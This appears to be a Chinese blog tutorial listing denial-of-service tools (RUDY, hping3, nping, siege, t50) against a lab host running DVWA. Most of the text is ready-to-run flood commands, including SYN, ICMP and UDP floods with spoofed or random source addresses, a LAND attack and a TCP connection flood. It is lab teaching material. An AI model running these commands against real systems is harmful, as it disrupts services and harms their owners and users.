二十八、拒绝服务--(9)拒绝服务攻击工具

1、RUDY

  • 慢速应用层http post攻击,与slowhttptest原理相同
  • 每次只传输一个字节的数据
  • 攻击有表单web页面,攻击时需指定攻击的参数名称

2、Hping3

  • 可以定制发送任何TCP/IP数据包,用于测试FW、端口扫描、性能测试
    Syn Flood攻击 
 # hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.50.183

靶机使用tcpdump -i eth0 -s 0 -vv查看

靶机抓包

ICMP Flood攻击

# hping3 -q -n -a 1.1.1.1 --icmp -d 200 --flood 192.168.50.183

UDP Flood攻击

# hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood 192.168.50.183

3、LAND攻击

  • 特殊种类的syn flood攻击
  • 源地址、目的地址都是受害者,受害者于自己完成三次握手
# hping3 -a 192.168.50.183 -S -d -p 22 --flood 192.168.50.183

4、TCP全连接DoS攻击

# nping --tcp-connect --rate=10000 -c 1000000000 -q 192.168.50.183

再次刷新访问tcp的80端口,无法正常显示


刷新无法显示

5、查公网IP

nping --echo-client "public" echo.nmap.org --udp

6、Siege压力测试

  • http/https压力测试工具,模拟多个用户并发访问请求
  • # siege -g http://192.168.50.183查看banner基本信息
siege -i -c 100 http://192.168.50.183/dvwa/login.php -A httttttptest -vv
攻击结果

使用定义的useragent
  • 同时统计多个url,使用-f调用字典文件 /etc/siege/urls.txt,随后直接使用siege -i -c 100 -vv

7、T50网络压力测试

# t50 192.168.50.183 --flood --turbo -S --protocol TCP --dport 22
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容